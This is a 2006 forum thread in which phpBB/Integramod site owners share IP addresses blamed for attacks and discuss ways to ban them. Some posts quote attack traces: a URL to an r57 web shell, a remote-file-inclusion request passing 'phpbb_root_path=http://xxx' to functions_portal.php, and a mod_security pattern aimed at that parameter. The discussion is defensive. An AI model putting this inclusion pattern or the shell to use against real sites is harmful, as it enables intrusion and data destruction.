Sub Menu
Links Menu
Online Users

In total there are 312 users online :: 3 registered, 0 hidden and 309 guests

Most users ever online was 1091 on Wed Aug 16, 2023 5:27 pm

Registered users: Bing [Bot], Google [Bot], Majestic-12 [Bot] based on users active over the past 60 minutes

Hacker IPs

This is where youll find security related information.
Discuss Integramod/phpbb security issues here.

Moderator: Integra Moderator

Hacker IPs

PostAuthor: computerz » Sun Sep 24, 2006 9:01 pm

Here are some of the IPs my mod_security picked up for hacking attempts, in case anyone is interested (not sure if these are NAT addresses are not, so ban at your own risk)

125.142.222.104
159.53.110.141
194.29.192.53
195.169.140.32
200.1.211.89
202.146.253.4
209.209.22.230
210.193.231.34
213.115.205.82
222.124.209.36
222.124.222.17
222.124.224.104
222.124.224.119
24.162.201.79
65.60.71.130
66.98.168.100
67.107.177.135
68.44.92.243
69.46.0.68
71.242.108.97
84.166.30.242

Each hack recorded for the above listed IP addresses, results in one of the following responses from mod_security:
  • Access denied with code 406. Error parsing POST parameters: Error normalising parameter value: Invalid URL encoding detected: not enough characters
  • Access denied with code 406. Error processing request body: Multipart: final boundary missing
  • Access denied with code 406. Pattern match "phpbb_root_path" at THE_REQUEST
Last edited by computerz on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.

computerz
Members
Members
 
Posts: 84
Likes: 0 post
Liked in: 0 post
Joined: Sun Aug 27, 2006 1:21 pm
Cash on hand: 0.00

PostAuthor: billmcelligott » Tue Sep 26, 2006 1:47 pm

190.40.57.188

200.106.106.1

http://www.estilosperu.com/joe/r57.txt
Hacked today by above

what we need is something to stop them getting in.
Last edited by billmcelligott on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.

billmcelligott
Newbie
Newbie
 
Posts: 5
Likes: 0 post
Liked in: 0 post
Joined: Tue Jun 13, 2006 1:37 pm
Cash on hand: 0.00

PostAuthor: ZacFields » Tue Sep 26, 2006 1:54 pm

I think everyone should post their hacker IP's so that we all can ban them. I think that would be a good step to take.

Zac
Last edited by ZacFields on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.

ZacFields
Sr Integra Member
Sr Integra Member
 
Posts: 426
Likes: 0 post
Liked in: 0 post
Joined: Wed May 24, 2006 10:14 pm
Cash on hand: 0.00

PostAuthor: computerz » Tue Sep 26, 2006 3:59 pm

^^ or make a shared ban-list script. The script would connect to a source list of IPs and automatically include them in your database. The soruce list can be updated automatically from each persons website.

But then you'd have integrity issues
Last edited by computerz on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.

computerz
Members
Members
 
Posts: 84
Likes: 0 post
Liked in: 0 post
Joined: Sun Aug 27, 2006 1:21 pm
Cash on hand: 0.00

Re: Hacker IPs

PostAuthor: Musher » Wed Sep 27, 2006 1:23 am

More:
85.96.83.210
85.97.115.21
88.226.36.123
Last edited by Musher on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.

Musher
Newbie
Newbie
 
Posts: 7
Likes: 0 post
Liked in: 0 post
Joined: Sun Mar 26, 2006 11:52 pm
Cash on hand: 0.00

PostAuthor: foxyone » Mon Oct 02, 2006 4:09 pm

forum got hacked this week... i was actually on the forum as it was being hacked and caught these 2 ips

81.213.243.190
85.102.116.111
Last edited by foxyone on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.

foxyone
Newbie
Newbie
 
Posts: 5
Likes: 0 post
Liked in: 0 post
Joined: Fri May 19, 2006 7:34 am
Cash on hand: 0.00

PostAuthor: suicico » Tue Oct 03, 2006 7:36 am

i banned the proxys. using the .htaaccess file
usually they use proxies .. so .. those ips USUALLY are not hackers ips
Last edited by suicico on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
[url=http]The World Of iPods In Greek[/url]
[url=http]Home Of yetileague[/url]

suicico
Newbie
Newbie
 
Posts: 23
Likes: 0 post
Liked in: 0 post
Joined: Sat Jun 10, 2006 9:47 pm
Cash on hand: 0.00

PostAuthor: billmcelligott » Sun Oct 08, 2006 9:49 am

85.137.4.127
81.181.15.6
200.172.242.39
195.140.142.113
147.202.64.162

includes/proxy.tgz

file inserted
Last edited by billmcelligott on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.

billmcelligott
Newbie
Newbie
 
Posts: 5
Likes: 0 post
Liked in: 0 post
Joined: Tue Jun 13, 2006 1:37 pm
Cash on hand: 0.00

Re: Hacker IPs

PostAuthor: netimpact » Sat Oct 21, 2006 3:40 am

I was hacked by 81.192.177.10. How he did it was doing a search from yahoo that target "Integaramod portal"
http://search.yahoo.com/search?ei=UTF-8&p=integramod+portal&fr=FP-pull-web-t&b=71


Next he did a POST /includes/functions_portal.php?phpbb_root_path=http://xxx to his web site and all my files are gone <img>

How possible he did it???
Last edited by netimpact on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.

netimpact
Newbie
Newbie
 
Posts: 9
Likes: 0 post
Liked in: 0 post
Joined: Fri Oct 20, 2006 6:56 am
Cash on hand: 0.00

How?

PostAuthor: Musher » Sat Oct 21, 2006 5:45 am

"suicico";p="16067" wrote:i banned the proxys. using the .htaaccess file
usually they use proxies .. so .. those ips USUALLY are not hackers ips


How do you do (write) that?

/c
Last edited by Musher on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.

Musher
Newbie
Newbie
 
Posts: 7
Likes: 0 post
Liked in: 0 post
Joined: Sun Mar 26, 2006 11:52 pm
Cash on hand: 0.00

PostAuthor: netimpact » Sat Oct 21, 2006 7:33 pm

two more IPs from Maroc Telecom and Turkey found

81.192.239.156
81.213.98.151
I am banning users from Marocoo and Turkey
Last edited by netimpact on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.

netimpact
Newbie
Newbie
 
Posts: 9
Likes: 0 post
Liked in: 0 post
Joined: Fri Oct 20, 2006 6:56 am
Cash on hand: 0.00


Return to Forum Security

Who is online

Registered users: Bing [Bot], Google [Bot], Majestic-12 [Bot]

cron